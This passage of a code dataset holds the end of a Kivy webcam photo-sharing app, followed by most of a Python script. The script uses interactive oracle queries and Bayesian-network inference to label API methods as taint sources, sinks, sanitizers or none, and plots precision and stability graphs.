Just copied & pasted\n\n def start(self):\n \"\"\"Starts the camera and changes the Button text\"\"\"\n self.ids.camera.play = True\n self.ids.camera.texture = self.ids.camera._camera.texture\n self.ids.camera.opacity = 1\n\n def stop(self):\n \"\"\"Stops the camera and changes the button text\"\"\"\n self.ids.camera.play = False\n self.ids.camera.texture = None\n self.ids.camera.opacity = 0\n\n\n def capture(self):\n \"\"\"Creates a unique file path with the current timestamp in the files dir\"\"\"\n self.file_path = \"files/\" + time.strftime(\"%Y%m%d-%H%M%S\") + \".png\"\n self.ids.camera.export_to_png(self.file_path)\n self.manager.current = \"image_screen\"\n self.manager.current_screen.ids.img.source = self.file_path\n\nclass ImageScreen(Screen):\n link_error_message = \"Generate a URl first!\"\n def create_link(self):\n \"\"\"Accesses the photo filepath, uploads it to the web and inserts the link\n in the Label widget\"\"\"\n # filepath = App.get_running_app().root.ids.camera_screen.filepath\n # filesharer = FileSharer(filepath=filepath)\n self.url = \"www.google.com\"\n self.ids.link.text = \"Filestack currently unavailable\"\n\n def copy_link(self):\n \"\"\"Copy link into the clipboard available for posting\"\"\"\n try:\n Clipboard.copy(self.url)\n except:\n self.ids.link.text = self.link_error_message\n\n def open_link(self):\n \"\"\"Open link with the default browser\"\"\"\n try:\n webbrowser.open(self.url)\n except:\n self.ids.link.text = self.link_error_message\n\n\nclass RootWidget(ScreenManager):\n pass\n\n\nclass MainApp(App):\n\n def build(self):\n return RootWidget()\n\n\nMainApp().run()\n\n\n","repo_name":"selimcanpolat/webcam-photo-sharer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74798458668","text":"import csv\nimport itertools as it\nimport json\nimport os\nimport os.path\nimport random\nimport time\nimport glob\nimport argparse\nimport re\n\nimport make_BN\nimport matplotlib.axes as axes\nimport matplotlib.patches as ptch\nimport matplotlib.pyplot as plt\nimport modin.pandas as pd\nimport networkx as nx\nimport numpy as np\nimport transfer_knowledge\nimport deal_with_poor_nodes\n\nfrom datetime import datetime\nfrom create_node import process\nfrom make_CPT import *\nfrom make_underlying_graph import call_reader, df_reader, find_edge_labels\nfrom matplotlib.ticker import MaxNLocator\nfrom pomegranate import *\nfrom scrape_oracle_docs import *\nfrom toolz import valmap\nfrom functools import reduce\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"solution_file\", help=\"path to the solution file. 
input 'None' if you don't have any.\",\n                    type=str)\nargs = parser.parse_args()\n\n# Constants ========================================\n# ==================================================\n\ndef retrieve_path():\n    \"\"\"Read paths.json and return the project root path.\"\"\"\n    with open(\"paths.json\", \"r+\") as pathjson:\n        pathdict = json.load(pathjson)\n    return pathdict[\"project_root_directory\"]\n\nPROJECT_ROOT_DIR = retrieve_path()\n\nif args.solution_file != \"None\":\n    with open(args.solution_file, \"r+\") as solution_file:\n        SOLUTION = json.load(solution_file)\nelse:\n    SOLUTION = None\n\nNOW = datetime.now().strftime(\"%Y-%m-%d-%H:%M:%S\")\nDF_EDGES = list(df_reader)\nCALL_EDGES = list(call_reader)\n\nWINDOW_SIZE = 4\nGLOBAL_GRAPH = nx.read_gpickle(\"graph_for_reference\")\nTOTAL_NUM_OF_METHS = GLOBAL_GRAPH.number_of_nodes()\n\nwith open(PROJECT_ROOT_DIR+\"skip_func.txt\", \"r+\") as skip_func:\n    skip_funcs = skip_func.readlines()\n    skip_funcs = list(map(lambda string: string.rstrip(), skip_funcs))\n\n\n# TODO: guide the interaction so that only the skip_func methods are asked about\n\n\n# Random loop ========================================\n# ====================================================\n\ndef random_loop(global_precision_list, snapshot_dict, BN_for_inference, graph_for_reference,\n                interaction_number, current_asked, current_evidence, prev_snapshot,\n                precision_list, stability_list, precision_inferred_list,\n                loop_time_list, window, graph_file):\n    \"\"\"The main interaction functionality, asking randomly\n       Parameters:\n            - BN_for_inference: the Bayesian Network.\n            - graph_for_reference: the underlying graph.\n            - interaction_number: number of interactions performed so far.\n            - current_asked: names of currently asked nodes.\n            - current_evidence: dict of given evidences accumulated so far\n            - prev_snapshot: snapshot from the previous call\n            - precision_list: accumulated precision values\n            - stability_list: accumulated stability values\n            - precision_inferred_list: accumulated precision values purely inferred by the BN\n            - loop_time_list: accumulated times taken in belief propagation\n            - window: sliding window with size 4\"\"\"\n\n    loop_start = time.time()\n\n    random_index = random.randint(0, len(BN_for_inference.states)-1)\n    state_names = list(map(lambda node: node.name, BN_for_inference.states))\n    num_of_states = len(state_names)\n    query = state_names[random_index]\n    while query in current_asked:\n        random_index = random.randint(0, len(BN_for_inference.states)-1)\n        query = BN_for_inference.states[random_index].name\n\n    its_time_to_terminate = time_to_terminate(BN_for_inference, current_evidence, window, criteria='confidence')\n\n    # exit the function based on confidence.\n    if its_time_to_terminate:\n        save_data_as_csv(prev_snapshot, state_names)\n        return (prev_snapshot, precision_list, stability_list,\n                precision_inferred_list, current_asked, global_precision_list)\n\n
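    # The oracle's answer is recorded as the integer state of the queried node's\n    # random variable: 1 = src (source), 2 = sin (sink), 3 = san (sanitizer),\n    # 4 = non (none), matching the branches below.\n    oracle_response = input(\"What label does <\" + query + \"> bear? 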
[src|sin|san|non]: \")\n\n if oracle_response == 'src':\n current_evidence[query] = 1\n elif oracle_response == 'sin':\n current_evidence[query] = 2\n elif oracle_response == 'san':\n current_evidence[query] = 3\n elif oracle_response == 'non':\n current_evidence[query] = 4\n elif oracle_response == 'exit':\n if SOLUTION is not None:\n draw_precision_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n precision_list, num_of_states, \"random\", interactive=False)\n draw_stability_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n stability_list, num_of_states, \"random\", interactive=False)\n draw_precision_inferred_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n precision_inferred_list, num_of_states, \"random\", interactive=False)\n save_data_as_csv(prev_snapshot, state_names)\n return prev_snapshot, precision_list, stability_list, precision_inferred_list\n\n current_asked.append(query)\n\n # the new snapshot after the observation and its inference time\n new_raw_snapshot = BN_for_inference.predict_proba(current_evidence, n_jobs=-1)\n new_snapshot = make_names_and_params(state_names, new_raw_snapshot)\n\n if SOLUTION:\n # update the snapshot_dict\n snapshot_dict[graph_file] = new_snapshot\n global_precision = evaluate_global_precision(snapshot_dict)\n global_precision_list.append(global_precision)\n\n # the new precision after the observation\n current_precision = calculate_precision(state_names, new_snapshot)\n precision_list[interaction_number] = current_precision\n\n # the new stability after the observation\n current_stability = calculate_stability(state_names, prev_snapshot, new_snapshot)\n stability_list[interaction_number] = current_stability\n\n # the new precision purely inferred by the BN, after the observation\n current_precision_inferred = calculate_precision_inferred(state_names, new_snapshot, interaction_number)\n precision_inferred_list[interaction_number] = current_precision_inferred\n\n # slide the window\n window = window[1:] # dequeue the oldest one\n window.append(new_snapshot) # and enqueue the newest one\n\n # record this loop's looping time\n loop_time_list.append(time.time()-loop_start)\n\n # visualize the current status if necessary\n if SOLUTION:\n visualize_snapshot(state_names, graph_for_reference, new_snapshot, [])\n draw_precision_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n precision_list, num_of_states, \"random\", interactive=True)\n draw_stability_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n stability_list, num_of_states, \"random\", interactive=True,)\n draw_precision_inferred_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n precision_inferred_list, num_of_states, \"random\", interactive=True)\n\n # loop!\n return random_loop(global_precision_list, snapshot_dict, BN_for_inference, graph_for_reference,\n interaction_number+1, current_asked, current_evidence, new_snapshot,\n precision_list, stability_list, precision_inferred_list,\n loop_time_list, window, graph_file)\n\n\n# tactical loop and its calculations =====================\n# ========================================================\n\ndef tactical_loop(global_precision_list, snapshot_dict, graph_for_reference, BN_for_inference,\n interaction_number, current_asked, current_evidence, updated_nodes,\n prev_snapshot, precision_list, stability_list,\n precision_inferred_list, loop_time_list, window, graph_file):\n \"\"\"the main interaction functionality (loops via recursion), asking 
tactically using d-separation\n       parameters:\n        - graph_for_reference: the underlying graph.\n        - interaction_number: number of interactions performed so far.\n        - current_asked: names of currently asked nodes.\n        - current_evidence: dict of given evidences accumulated so far\n        - updated_nodes: updated nodes which are currently being kept track of\n        - prev_snapshot: snapshot from the previous call\n        - precision_list: accumulated precision values\n        - stability_list: accumulated stability values\n        - precision_inferred_list: accumulated precision values purely inferred by the BN\n        - loop_time_list: accumulated times taken in belief propagation\n        - window: sliding window with size 4\"\"\"\n\n    loop_start = time.time()\n\n    state_names = list(map(lambda node: node.name, BN_for_inference.states))\n    APIs = list(filter(lambda node: node in skip_funcs, state_names))\n\n    num_of_states = len(state_names)\n    num_of_APIs = len(APIs)\n\n    # some variables to make our code resemble English\n    there_are_nodes_left = find_max_d_con(graph_for_reference, BN_for_inference, current_asked,\n                                          updated_nodes, APIs)\n    there_are_no_nodes_left = not there_are_nodes_left\n    its_time_to_terminate = time_to_terminate(BN_for_inference, current_evidence, window, criteria='plateau')\n    not_yet_time_to_terminate = not its_time_to_terminate\n\n    # pick a method to ask by finding one with the maximum number of D-connected nodes\n    if there_are_no_nodes_left:\n        query = None\n        dependent_nodes = []\n    else:\n        query = there_are_nodes_left[0]\n        dependent_nodes = there_are_nodes_left[1]\n\n    # exit the function based on various termination measures.\n    if there_are_no_nodes_left and not_yet_time_to_terminate:\n        if set(state_names) == set(current_asked):\n            print(\"\\nWarning: some distributions are not fully determined.\\n\")\n            if SOLUTION:\n                draw_precision_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n                                     precision_list, num_of_APIs, \"tactical\", interactive=False)\n                draw_stability_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n                                     stability_list, num_of_APIs, \"tactical\", interactive=False)\n                draw_precision_inferred_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n                                              precision_inferred_list, num_of_APIs, \"tactical\", interactive=False)\n            save_data_as_csv(state_names, prev_snapshot)\n            return (prev_snapshot, precision_list, stability_list,\n                    precision_inferred_list, loop_time_list, current_asked,\n                    global_precision_list)\n        else:\n            query, dependent_nodes = find_max_d_con(graph_for_reference, BN_for_inference,\n                                                    [], [], remove_sublist(state_names, current_asked))\n    elif there_are_no_nodes_left and its_time_to_terminate:\n        if SOLUTION:\n            draw_precision_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n                                 precision_list, num_of_APIs, \"tactical\", interactive=False)\n            draw_stability_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n                                 stability_list, num_of_APIs, \"tactical\", interactive=False)\n            draw_precision_inferred_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n                                          precision_inferred_list, num_of_APIs, \"tactical\", interactive=False)\n        save_data_as_csv(state_names, prev_snapshot)\n        return (prev_snapshot, precision_list, stability_list,\n                precision_inferred_list, loop_time_list, current_asked,\n                global_precision_list)\n    elif there_are_nodes_left and not_yet_time_to_terminate:\n        pass\n    elif there_are_nodes_left and its_time_to_terminate:\n        save_data_as_csv(state_names, prev_snapshot)\n        return (prev_snapshot, precision_list, stability_list,\n                
precision_inferred_list, loop_time_list, current_asked,\n                global_precision_list)\n\n    # ask the chosen method and read the oracle's answer\n    oracle_response = input(\"What label does <\" + query + \"> bear? [src|sin|san|non]: \")\n    updated_nodes += list(d_connected(graph_for_reference, BN_for_inference,\n                                      query, current_asked, APIs))\n\n    if oracle_response == 'src':\n        current_evidence[query] = 1\n    elif oracle_response == 'sin':\n        current_evidence[query] = 2\n    elif oracle_response == 'san':\n        current_evidence[query] = 3\n    elif oracle_response == 'non':\n        current_evidence[query] = 4\n    elif oracle_response == 'exit':\n        draw_precision_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n                             precision_list, num_of_states, \"tactical\", interactive=False)\n        draw_stability_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n                             stability_list, num_of_states, \"tactical\", interactive=False)\n        draw_precision_inferred_graph(graph_file, list(range(1, len(BN_for_inference.states)+1)),\n                                      precision_inferred_list, num_of_states, \"tactical\", interactive=False)\n        return (prev_snapshot, precision_list, stability_list,\n                precision_inferred_list, loop_time_list, current_asked,\n                global_precision_list)\n\n    current_asked.append(query)\n\n    # the new snapshot after the observation\n    new_raw_snapshot = BN_for_inference.predict_proba(current_evidence, n_jobs=-1)\n    new_snapshot = make_names_and_params(APIs, new_raw_snapshot)\n\n    if SOLUTION:\n        # update the snapshot_dict\n        snapshot_dict[graph_file] = new_snapshot\n        global_precision = evaluate_global_precision(snapshot_dict)\n        global_precision_list.append(global_precision)\n\n    # the new precision after the observation\n    current_precision = calculate_precision(APIs, new_snapshot)\n    precision_list[interaction_number] = current_precision\n\n    # the new stability after the observation\n    current_stability = calculate_stability(APIs, prev_snapshot, new_snapshot)\n    stability_list[interaction_number] = current_stability\n\n    # the new precision purely inferred by the BN, after the observation\n    current_precision_inferred = calculate_precision_inferred(APIs, new_snapshot,\n                                                              interaction_number)\n    precision_inferred_list[interaction_number] = current_precision_inferred\n\n    # slide the window\n    window = window[1:]  # dequeue the oldest one\n    window.append(new_snapshot)  # and enqueue the newest one\n\n    # record this loop's looping time\n    loop_time_list.append(time.time()-loop_start)\n\n    # visualize the current status if necessary\n    if SOLUTION:\n        visualize_snapshot(state_names, graph_for_reference, new_snapshot, [])\n        draw_precision_graph(graph_file, list(range(1, num_of_APIs+1)),\n                             precision_list, num_of_states, \"tactical\", interactive=True)\n        draw_stability_graph(graph_file, list(range(1, num_of_APIs+1)),\n                             stability_list, num_of_states, \"tactical\", interactive=True)\n        draw_precision_inferred_graph(graph_file, list(range(1, num_of_APIs+1)),\n                                      precision_inferred_list, num_of_states, \"tactical\", interactive=True)\n\n    # loop!\n    return tactical_loop(global_precision_list, snapshot_dict, graph_for_reference, BN_for_inference,\n                         interaction_number+1, current_asked, current_evidence, updated_nodes,\n                         new_snapshot, precision_list, stability_list,\n                         precision_inferred_list, loop_time_list, window, graph_file)\n\n\ndef d_connected(graph_for_reference, BN_for_inference, node, current_asked, pool):\n    \"\"\"Given the nodes asked so far, find the set of nodes that are d-connected to (i.e. not conditionally independent of) node. 
Complexity: O(n).\"\"\"\n    out = set()\n    state_names = list(map(lambda node: node.name, BN_for_inference.states))\n    for other_node in state_names:\n        if nx.d_separated(graph_for_reference, {node}, {other_node}, set(current_asked)):\n            out.add(other_node)\n    return set(state_names) - out\n\n\ndef remove_sublist(lst, sublst):\n    \"\"\"remove the sublst from lst without any side-effect.\"\"\"\n    out = []\n    for elem in lst:\n        if elem not in sublst:\n            out.append(elem)\n    return out\n\n\ndef forall(unary_pred, collection):\n    return reduce(lambda acc, elem: unary_pred(elem) and acc, collection, True)\n\n\ndef find_max_d_con(graph_for_reference, BN_for_inference,\n                   current_asked, updated_nodes, list_of_all_nodes):\n    \"\"\"Return the node with the largest number of d-connected nodes; return None if there is no node left to pick.\"\"\"\n    node_dataframe = pd.DataFrame(list_of_all_nodes, columns=['nodes'])\n    mapfunc = lambda row: len(d_connected(graph_for_reference, BN_for_inference,\n                                          row['nodes'], current_asked,\n                                          list_of_all_nodes)-set(current_asked)-set(updated_nodes))\n    d_con_set_len = node_dataframe.apply(mapfunc, axis=1)\n    if d_con_set_len.mask(d_con_set_len == 0).dropna().empty:\n        return None\n    node_dataframe[\"d_con_set_len\"] = d_con_set_len\n    node_dataframe.sort_values(by=[\"d_con_set_len\"], inplace=True, ascending=False)\n    return node_dataframe.iloc[0].nodes, node_dataframe.iloc[0].d_con_set_len\n\n\ndef is_confident(parameters):\n    \"\"\"Inspect a probability distribution (the parameters part of a Distribution object)\n       and check whether the highest probability is at least 0.1 higher than every other one.\"\"\"\n    if type(parameters) == dict:\n        parameters = list(parameters.values())\n    first_rank = max(parameters)\n    parameters_ = parameters[:]\n    parameters_.remove(first_rank)\n    second_rank = max(parameters_)\n    return first_rank - second_rank >= 0.1\n\n\ndef time_to_terminate(BN_for_inference, current_evidence, window, **kwargs):\n    \"\"\"determine if it's time to terminate, based on different measures\n       - Available kwargs:\n         - 'plateau': terminate loop if the precision seems to be plateauing\n         - 'confidence': terminate loop if all nodes are confidently updated\"\"\"\n    state_names = list(map(lambda node: node.name, BN_for_inference.states))\n    if kwargs['criteria'] == 'confidence':\n        # the distribution across random variables' values\n        snapshot = BN_for_inference.predict_proba(current_evidence, n_jobs=-1)\n        names_and_params = make_names_and_params(state_names, snapshot)\n        params = list(map(lambda tup: tup[1], names_and_params))\n        # list of lists of the probabilities across random variables' values, extracted from dist_dicts\n        dist_probs = list(map(lambda distobj: list(distobj.values()), params))\n        # Do all the nodes' probability lists satisfy is_confident()?\n        return reduce(lambda acc, lst: is_confident(lst) and acc, dist_probs, True)\n    elif kwargs['criteria'] == 'plateau':\n        # take a look at the contents of the window\n        acc = ()\n        for snapshot in window:\n            params = list(map(lambda tup: tup[1], snapshot))\n            names_and_labels = list(map(lambda tup: (tup[0], find_max_val(tup[1])), snapshot))\n            acc += (names_and_labels,)\n\n        a, b, c, d = acc\n\n        initial = np.ndarray([0])\n\n        all_4_are_equal = np.array_equal(a, b) and np.array_equal(b, c) and np.array_equal(c, d)\n\n        any_of_4_are_initial = np.array_equal(a, initial) or\\\n            np.array_equal(b, initial) or\\\n            np.array_equal(c, initial) or\\\n            np.array_equal(d, initial)\n\n        there_is_a_pothole = (np.array_equal(a, c) and not np.array_equal(a, b) or\\\n                              np.array_equal(a, d) and not np.array_equal(c, d)) and\\\n                              not np.array_equal(a, initial) and\\\n                              not np.array_equal(c, initial) 
and\\\n not np.array_equal(d, initial)\n\n if all_4_are_equal and not any_of_4_are_initial:\n return True\n elif there_is_a_pothole:\n return True\n else:\n return False\n\n\ndef count_confident_nodes(state_names, snapshot):\n # the distribution across random variables' values\n names_and_params = make_names_and_params(state_names, snapshot)\n params = list(map(lambda tup: tup[1], names_and_params))\n # list of lists of the probabilities across random variables' values, extracted from dist_dicts\n dist_probs = list(map(lambda dist: list(dist.values()), params))\n # Do all the nodes' probability lists satisfy is_confident()?\n acc = 0\n for lst in dist_probs:\n if is_confident(lst):\n acc += 1\n return acc\n\n\ndef normalize_dist(oracle_response):\n \"\"\"*int로 주어진* oracle_response에 따라 4-nomial distribution을 만든다.\"\"\"\n if oracle_response == 1:\n return {1.0: 1, 2.0: 0, 3.0: 0, 4.0: 0}\n elif oracle_response == 2:\n return {1.0: 0, 2.0: 1, 3.0: 0, 4.0: 0}\n elif oracle_response == 3:\n return {1.0: 0, 2.0: 0, 3.0: 1, 4.0: 0}\n elif oracle_response == 4:\n return {1.0: 0, 2.0: 0, 3.0: 0, 4.0: 1}\n\n\ndef find_max_val(stats):\n max_key = max(stats, key=lambda key: stats[key])\n if max_key == 1.0:\n return \"src\"\n elif max_key == 2.0:\n return \"sin\"\n elif max_key == 3.0:\n return \"san\"\n elif max_key == 4.0:\n return \"non\"\n\n\n# visualizing functions and their dependencies ============\n# =========================================================\n\nnode_colordict = {\"src\": \"red\", \"sin\": \"orange\", \"san\": \"yellow\", \"non\": \"green\"}\n\ndef visualize_snapshot(state_names, graph_for_reference, snapshot, dependent_nodes):\n \"\"\"한번 iteration 돌 때마다, 전체 BN의 snapshot을 가시화한다. 이 때, confident node들 위에는 `conf`라는 문구를 띄운다.\"\"\"\n network_figure = plt.figure(\"Bayesian Network\", figsize=(30, 15))\n network_figure.clf()\n plt.ion()\n ax = network_figure.add_subplot()\n params = list(map(lambda tup: tup[1], snapshot))\n names_and_labels = list(map(lambda tup: (tup[0], find_max_val(tup[1])), snapshot))\n node_colormap = create_node_colormap(state_names, names_and_labels)\n edge_colormap = create_edge_colormap(graph_for_reference)\n\n node_posmap = nx.circular_layout(graph_for_reference)\n\n # confident node들 위에 문구 띄우기\n confident_node_indices = []\n for i, param in enumerate(params):\n if is_confident(param):\n confident_node_indices.append(i)\n confident_nodes = list(map(lambda index: snapshot[index][0], confident_node_indices))\n for confident_node in confident_nodes:\n x, y = node_posmap[confident_node]\n plt.text(x, y+0.1, s='conf', bbox=dict(facecolor='blue', alpha=0.5), horizontalalignment='center')\n\n for node_name in list(graph_for_reference.nodes):\n if node_name not in state_names:\n graph_for_reference.remove_node(node_name)\n\n nx.draw(graph_for_reference,\n node_color=node_colormap, edge_color=edge_colormap,\n pos=node_posmap,\n ax=ax,\n with_labels=True, node_size=100)\n\n plt.show()\n\n\ndef draw_precision_graph(graph_file, x, y, num_of_states, loop_type, interactive=True):\n \"\"\"precision graph를 그리는 함수. NOTE: x와 y의 input 길이를 맞춰줘야 함.\n Available kwargs:\n - interactive [True|False]: Interactively show & update vs. 
save as png file\"\"\"\n plt.ion()\n precision_figure = plt.figure(\"Precision\")\n ax = precision_figure.gca()\n ax.xaxis.set_major_locator(MaxNLocator(integer=True))\n ax.yaxis.set_major_locator(MaxNLocator(integer=True))\n precision_figure.clf()\n plt.xlim(1, num_of_states)\n plt.ylim(0, num_of_states)\n plt.xlabel('# of interactions')\n plt.ylabel('# of correct nodes')\n plt.title(\"Precision development during interaction (\"+loop_type+\")\")\n plt.plot(x, y, 'b-')\n if interactive:\n precision_figure.canvas.draw()\n else:\n if not os.path.isdir(graph_file+\"_stats\"):\n os.mkdir(graph_file+\"_stats\")\n plt.savefig(graph_file+\"_stats\"+os.sep+\\\n \"precision_graph_\"+NOW+\"_\"+loop_type+\".png\")\n\n\ndef draw_stability_graph(graph_file, x, y, num_of_states, loop_type, interactive=True):\n \"\"\"stability graph를 그리는 함수. NOTE: x와 y의 input 길이를 맞춰줘야 함.\n Available kwargs:\n - interactive [True|False]: Interactively show & update vs. save as png file\"\"\"\n plt.ion()\n stability_figure = plt.figure(\"Stability\")\n ax = stability_figure.gca()\n ax.xaxis.set_major_locator(MaxNLocator(integer=True))\n ax.yaxis.set_major_locator(MaxNLocator(integer=True))\n stability_figure.clf()\n plt.xlim(1, num_of_states)\n plt.ylim(0, num_of_states)\n plt.xlabel(\"# of interactions\")\n plt.ylabel('# of changed nodes')\n plt.title(\"Stability development during interaction (\"+loop_type+\")\")\n plt.plot(x, y, 'b-')\n if interactive:\n stability_figure.canvas.draw()\n else:\n if not os.path.isdir(graph_file+\"_stats\"):\n os.mkdir(graph_file+\"_stats\")\n plt.savefig(graph_file+\"_stats\"+os.sep+\\\n \"stability_graph_\"+NOW+\"_\"+loop_type+\".png\")\n\n\ndef draw_precision_inferred_graph(graph_file, x, y, num_of_states, loop_type, interactive=True):\n \"\"\"순수하게 BN이 추론해서 맞힌 노드의 개수에 대한 그래프를 그리는 함수. NOTE: x와 y의 input 길이를 맞춰줘야 함.\n Available kwargs:\n - interactive [True|False]: Interactively show & update vs. 
save as png file\"\"\"\n plt.ion()\n precision_inferred_figure = plt.figure(\"Inferred Precision\")\n ax = precision_inferred_figure.gca()\n ax.xaxis.set_major_locator(MaxNLocator(integer=True))\n ax.yaxis.set_major_locator(MaxNLocator(integer=True))\n precision_inferred_figure.clf()\n plt.xlim(1, num_of_states)\n plt.ylim(0, num_of_states)\n plt.xlabel(\"# of interactions\")\n plt.ylabel('# of correctly inferred nodes')\n plt.title(\"Inferred precision development during interaction (\"+loop_type+\")\")\n plt.plot(x, y, 'b-')\n if interactive:\n precision_inferred_figure.canvas.draw()\n else:\n if not os.path.isdir(graph_file+\"_stats\"):\n os.mkdir(graph_file+\"_stats\")\n plt.savefig(graph_file+\"_stats\"+os.sep+\\\n \"precision_inferred_graph_\"+NOW+\"_\"+loop_type+\".png\")\n\n\ndef draw_n_save(graph_file, BN_for_inference, precision_list, stability_list, precision_inferred_list, **kwargs):\n \"\"\"available kwargs: random, tactical\"\"\"\n interaction_number = len(precision_list)\n\n state_names = list(map(lambda node: node.name, BN_for_inference.states))\n num_of_states = len(state_names)\n\n draw_precision_graph(graph_file, range(interaction_number),\n precision_list, num_of_states, kwargs[\"loop_type\"])\n draw_stability_graph(graph_file, range(interaction_number),\n stability_list, num_of_states, kwargs[\"loop_type\"])\n draw_precision_inferred_graph(graph_file, range(interaction_number),\n precision_inferred_list, num_of_states, kwargs[\"loop_type\"])\n\n\ndef create_node_colormap(state_names, names_and_labels):\n \"\"\"BN을 기준으로 계산된 names_and_labels를 받아서 graph_for_reference를 기준으로 한 colormap을 만든다.\"\"\"\n out = list(state_names)[:]\n for name, label in names_and_labels:\n index = out.index(name)\n out[index] = node_colordict[label]\n return out\n\n\ndef create_edge_colormap(graph_for_reference):\n \"\"\"엣지 목록을 받아서, 엣지의 종류에 따라 graph_for_reference를 그릴 때 엣지의 색깔을 달리한다.\"\"\"\n out = list(graph_for_reference.edges)[:]\n for edge in out:\n index = out.index(edge)\n if edge in DF_EDGES: # df\n out[index] = \"red\"\n elif edge in CALL_EDGES: # call\n out[index] = \"green\"\n else: # sim\n out[index] = \"blue\"\n return out\n\n\ndef make_names_and_params(state_names, snapshot):\n \"\"\"snapshot을 읽어서, 랜덤변수 별 확률값의 dict인 parameters만을 빼낸 다음 node의 이름과 짝지어서 list에 담아 낸다.\"\"\"\n distobjs = []\n for distobj in snapshot:\n if type(distobj) == int or type(distobj) == float: # oracle에 의해 고정된 경우!\n distobjs.append(normalize_dist(distobj))\n else:\n distobjs.append(distobj.parameters[0])\n names_and_params = list(zip(state_names, distobjs))\n return names_and_params\n\n\ndef report_results(state_names, initial_snapshot, final_snapshot):\n names_and_dists_initial = make_names_and_params(state_names, initial_snapshot)\n names_and_labels_initial = list(map(lambda tup: (tup[0], find_max_val(tup[1])), names_and_dists_initial))\n\n names_and_dists_final = make_names_and_params(state_names, final_snapshot)\n names_and_labels_final = list(map(lambda tup: (tup[0], find_max_val(tup[1])), names_and_dists_final))\n\n for tup1, tup2 in zip(names_and_labels_initial, names_and_labels_final):\n # if the label has changed after interaction\n if tup1[1] != tup2[1]:\n print(tup1[0]+\" is updated from \"+tup1[1]+\" to \"+tup2[1])\n\n\ndef save_data_as_csv(state_names, final_snapshot):\n \"\"\"inference가 다 끝난 label들을 csv로 저장한다.\"\"\"\n names_and_labels_final = list(map(lambda tup: (tup[0], find_max_val(tup[1])), final_snapshot))\n out_df = pd.DataFrame(names_and_labels_final, columns=[\"name\", \"label\"])\n # append to 
the file if it exists\n out_df.to_csv(\"inferred.csv\", mode='a', header=not os.path.exists(\"inferred.csv\"))\n\n\ndef report_meta_statistics(graph_for_reference, BN_for_inference):\n \"\"\"meta-functionality for debugging\"\"\"\n print(\"# of nodes: \", len(list(BN_for_inference.states)))\n print(\"# of edges: \", len(list(BN_for_inference.edges)))\n\n state_names = list(map(lambda node: node.name, BN_for_inference.states))\n max_num_of_in_edges = max(list(map(lambda node: len(graph_for_reference.in_edges(nbunch=node)), state_names)))\n max_num_of_out_edges = max(list(map(lambda node: len(graph_for_reference.out_edges(nbunch=node)), state_names)))\n print(\"maximum # of in-edges:\", max_num_of_in_edges)\n print(\"maximum # of out-edges:\", max_num_of_out_edges)\n\n\n# Methods for calculating graph values ====================\n# =========================================================\n\ndef calculate_precision(state_names, current_snapshot):\n \"\"\"Measure the precision of the current probability-distribution snapshot.\"\"\"\n names_and_labels = dict(map(lambda tup: (tup[0], find_max_val(tup[1])), current_snapshot))\n correct_nodes = []\n for node_name in state_names:\n if names_and_labels[node_name] == SOLUTION[node_name]:\n correct_nodes.append(node_name)\n return len(correct_nodes)\n\n\ndef calculate_stability(state_names, prev_snapshot, current_snapshot):\n \"\"\"Measure the stability of the current probability-distribution snapshot against the previous one.\n stability at time t: the number of nodes whose label changed in the snapshot at time t\n compared with the snapshot at time (t-1).\"\"\"\n names_and_labels_prev = dict(map(lambda tup: (tup[0], find_max_val(tup[1])), prev_snapshot))\n names_and_labels_current = dict(map(lambda tup: (tup[0], find_max_val(tup[1])), current_snapshot))\n changed_nodes = []\n for node_name in names_and_labels_current.keys():\n if names_and_labels_prev[node_name] != names_and_labels_current[node_name]:\n changed_nodes.append(node_name)\n return len(changed_nodes)\n\n\n
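# Worked example for the metric below (hypothetical numbers): if 40 labels are\n# correct after the oracle has answered 12 queries, the purely-inferred precision\n# is 40 - 12 = 28, i.e. the labels the BN got right without being told.\n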
def calculate_precision_inferred(state_names, current_snapshot, number_of_interaction):\n \"\"\"From the current probability-distribution snapshot, count how many labels the BN inferred purely on its own are correct.\"\"\"\n # current_snapshot: np.ndarray of Distribution.\n names_and_labels = dict(map(lambda tup: (tup[0], find_max_val(tup[1])), current_snapshot))\n correct_nodes = []\n for node_name in state_names:\n if names_and_labels[node_name] == SOLUTION[node_name]:\n correct_nodes.append(node_name)\n return len(correct_nodes) - number_of_interaction\n\n\n# Finding graph files =====================================\n# =========================================================\n\ndef find_pickled_graphs():\n return list([f for f in os.listdir('.') if re.match(r'.*_graph_[0-9]+$', f)])\n\n# main ====================================================\n# =========================================================\n\ndef single_loop(snapshot_dict, graph_file, graph_for_reference,\n BN_for_inference, learned_evidence, **kwargs):\n \"\"\"do a random or tactical loop on a given graph file\n - Available kwargs:\n - loop_type ([random|tactical]): whether we should use the random or the tactical loop.\"\"\"\n\n # the list of names of all states\n state_names = list(map(lambda node: node.name, BN_for_inference.states))\n\n # argument initialization\n initial_prediction_time = time.time()\n initial_raw_snapshot = BN_for_inference.predict_proba(learned_evidence, n_jobs=-1)\n initial_snapshot = make_names_and_params(state_names, initial_raw_snapshot)\n number_of_states = len(BN_for_inference.states)\n initial_precision_list = [np.nan for _ in range(len(BN_for_inference.states))]\n initial_stability_list = [np.nan for _ in range(len(BN_for_inference.states))]\n initial_precision_inferred_list = [np.nan for _ in range(len(BN_for_inference.states))]\n initial_window = [np.ndarray([0]) for _ in range(WINDOW_SIZE)]\n initial_asked = list(learned_evidence.keys())\n\n initial_updated_nodes = []\n for initial_query in initial_asked:\n initial_updated_nodes += list(set(d_connected(graph_for_reference, BN_for_inference,\n initial_query, initial_asked, state_names)))\n\n # random loop\n if 